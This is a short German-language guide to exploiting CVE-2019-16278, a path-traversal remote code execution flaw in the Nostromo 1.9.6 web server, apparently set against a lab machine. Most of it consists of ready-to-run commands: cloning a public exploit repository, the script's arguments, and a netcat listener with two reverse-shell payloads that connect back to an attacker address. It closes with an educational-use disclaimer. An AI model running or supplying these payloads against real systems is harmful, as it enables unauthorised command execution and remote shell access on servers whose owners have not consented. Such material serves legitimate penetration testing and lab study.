
Ein nicht authentifizierter Angreifer kann den Server dazu zwingen, auf eine Shell-Datei wie ‘/bin/sh’ zu verweisen und beliebige Befehle auszuführen, da die URL nicht verifiziert wird, was zu einem Path Traversal auf beliebige Dateien führt, die im System vorhanden sind. Nostromo-Versionen wie 1.9.6 verifizieren diese URL nicht.
POC
Repository: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
Dieses Repository enthält einen Python-Exploit für CVE-2019-16278, eine Schwachstelle in Nostromo 1.9.6 (einem Webserver). Die Schwachstelle ermöglicht Remote Code Execution (RCE) durch Ausnutzung von Directory Traversal, um beliebige Befehle auf dem Zielsystem auszuführen.
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]
Argumente:
| Argument | Beschreibung | Erforderlich | Standard |
|---|---|---|---|
| -t, --target | Die IP-Adresse des Ziels | Ja | Keiner |
| -p, --port | Der Port des Ziels | Ja | Keiner |
| -c, --command | Der auf dem Server auszuführende Befehl | Ja | Keiner |
| -b, --bytes | Anzahl der zu lesenden Bytes in der Antwort | Nein | 4096 |
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"
Schritt 1: Starten Sie einen Netcat-Listener auf Ihrem Angriffsrechner:
nc -lvnp 443
Schritt 2: Führen Sie den Exploit mit einem Reverse-Shell-Payload aus:
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"
Dieses Tool ist nur für Bildungszwecke bestimmt. Verwenden Sie es nicht auf Systemen, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Unautorisierter Zugriff auf Systeme ist illegal. Nutzen Sie es verantwortungsvoll.